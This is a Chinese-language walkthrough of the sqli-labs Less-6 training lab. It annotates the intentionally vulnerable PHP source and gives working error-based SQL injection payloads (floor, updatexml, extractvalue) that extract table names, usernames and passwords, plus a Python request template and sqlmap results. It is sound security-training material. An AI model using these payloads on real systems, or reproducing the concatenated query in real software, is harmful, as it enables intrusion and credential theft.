sqli-lab-less6
一、靶标地址
Less-6 GET-Double Injection-Double Quotes-string
#字符型带双引号双注入
http://127.0.0.1/sqli/less-6/
二、漏洞探测
http://127.0.0.1/sqli/less-6/?id=1
#正常回显
#You are in...........
http://127.0.0.1/sqli/less-6/?id=1'
#正常回显
http://127.0.0.1/sqli/less-6/?id=1"
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1
#单引号里面的是报错的语句 "1"" LIMIT 0,1
#由报错信息可推断后端语句为 where id="$id" limit 0,1
http://127.0.0.1/sqli/less-6/?id=1" --+
#正常回显
#You are in...........
#select * from users where id="1" limit 0,1;
思路:正常回显无法爆库,须通过报错回显爆库
三、源码分析
<?php
// sqli-labs Less-6: intentionally vulnerable lookup of a single `users` row by
// the GET parameter `id`. The code is kept exactly as shipped for analysis; the
// comments mark the root cause and the error channel the rest of this page uses.
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
// Suppresses PHP-level warnings/notices only. The database error printed
// further down comes from mysql_error() and is NOT affected by this setting.
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
// Untrusted input: taken straight from the query string with no validation or
// type check (the else-branch message below asks for a numeric value, but
// nothing here enforces that).
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
// The raw, unsanitised value is appended to result.txt via a relative path, so
// the file sits next to this script — presumably inside the web root; confirm
// whether it is reachable over HTTP before reusing this logging pattern.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
// Vulnerable statement. The value is merely wrapped in double quotes and then
// concatenated into the query text, so a `"` inside the input closes the string
// literal and the remainder is parsed as SQL. The fix is a parameterised query
// (mysqli or PDO prepared statement); quoting is not a substitute. Note also
// that the mysql_* extension is deprecated and removed in modern PHP.
$id = '"'.$id.'"'; // wraps the raw id in double quotes
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
// A successful query prints only this fixed banner; no column of the matched
// row is echoed, which is why a "normal" response leaks no data.
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="3" color= "#FFFF00">';
// The verbatim MySQL error text is written into the HTML response. This is the
// error-based disclosure channel: whatever the server places in its error
// message is shown to the client. Mitigation: log the error server-side and
// return a generic message instead.
print_r(mysql_error());
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>
四、黑盒与白盒测试
#黑白盒直接测试
// The statements that matter for testing, excerpted from the source above: the
// only input handling is wrapping $id in double quotes before it is concatenated
// into the SQL text, and the database error is printed verbatim to the client.
$id = '"'.$id.'"'; // wraps the raw id in double quotes
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
print_r(mysql_error());
相关函数:
floor()、updatexml()、extractvalue()
原理参照less-5
1、floor()函数报错
#获取数据库 用户 版本号
id=0" union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
#获取表名
id=0" union select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
#获取列名
id=0" union select 1,2,3 from (select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
#获取用户名
id=0" union select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+
2、updatexml()函数报错
#获取数据库名
id=1" and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) --+
#XPATH syntax error: '~security~root@localhost~5.5.53'
#获取表名
id=1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),0) --+
#Subquery returns more than 1 row
id=1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0) --+
#XPATH syntax error: '~emails'
#获取列名
id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),0) --+
#获取列字段
id=1" and updatexml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e),0) --+
id=1" and updatexml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),0) --+
3、extractvalue()函数报错
#获取当前数据库名
id=1" union select 1,2,extractvalue(1,concat(0x7e,(select database()))) --+
#XPATH syntax error: '~security~root@localhost~5.5.53'
#获取表名
id=1" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+
#XPATH syntax error: '~emails,referers,uagents,users'
#获取列名
id=1" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) --+
#XPATH syntax error: '~id,username,password'
#获取列字段
id=1" and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1),0x7e)) --+
id=1" and extractvalue(1,concat(0x7e,(select password from security.users limit 0,1),0x7e)) --+
五、脚本撰写
import requests
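# Request template for this page's target, the Less-6 lab. The original pointed
# at less-3, which does not match the lab analysed above.
url = "http://127.0.0.1/sqli/less-6/index.php?id=1"
# Browser-like request headers so the lab sees an ordinary GET.
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
# Appended verbatim to the URL; left empty so the request fetches the baseline page.
payload = ""
# A timeout is required: without one requests.get() can block indefinitely if the
# lab server stalls.
response = requests.get(url + payload, headers=header, timeout=10)
print(response.text)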
六、sqlmap
sqlmap -u http://127.0.0.1/sqli/less-6/index.php?id=1
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=1" AND 3522=3522#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1" AND (SELECT 4730 FROM(SELECT COUNT(*),CONCAT(0x71707a7671,(SELECT (ELT(4730=4730,1))),0x716a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VNHE
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1" AND (SELECT 1180 FROM (SELECT(SLEEP(5)))gUVz)-- xPrk
七、总结
正常回显无法爆库,须通过报错回显爆库